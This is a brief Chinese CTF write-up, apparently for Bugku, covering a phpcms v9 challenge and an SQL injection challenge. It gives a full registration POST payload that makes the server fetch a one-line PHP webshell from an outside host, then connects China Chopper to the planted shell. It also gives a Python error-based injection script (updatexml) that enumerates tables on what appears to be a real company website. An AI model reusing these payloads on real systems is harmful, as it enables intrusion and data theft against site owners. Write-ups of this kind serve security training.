phpcmsv9
这题叫道理应该是考phpcmsv9的漏洞的,但是挂了,连注册都注册不了.......
不过有个非预期解,访问一个robots.txt居然就看到flag了,交一发还是对的.......
正确的解法应该是找到注册页面
填写了以后在post数据最后加一句&info[content]=<img src=http://www.bugku.com/tools/phpyijuhua.txt?.php#.jpg>
最后的整体数据就是siteid=1&modelid=11&username=rouji&password=rouji123&email=156046546@qq.com&info[content]=<img src=http://www.bugku.com/tools/phpyijuhua.txt?.php#.jpg>&dosubmit=1&protocol=
链接是bugku的小马,然后复制repeater的返回包的链接就可以连菜刀了
实战2-注入
这题翻翻网页可以看到news这个网页有个id值,试下在后面加个单引号发现有报错,尝试注入,一般的闭合很难完全绕过,最后用报错注入
然后继续试下看表也是能看到,题目说了是最后一个表,后台应该有很多表,拿个脚本跑一跑
import re
import requests
url = "http://www.kabelindo.co.id/readnews.php"
for i in range(0,100):
payload = "id=1 and (updatexml(@,concat(1,(select table_name from information_schema.tables where table_schema=database() limit %s,1)),1))"%i
res = requests.get(url=url,params=payload).text
search = re.search('XPATH syntax error: (.*)',res).group(0)
print("%s table: %s"%(i,search))
所以flag就是flag{tbnomax}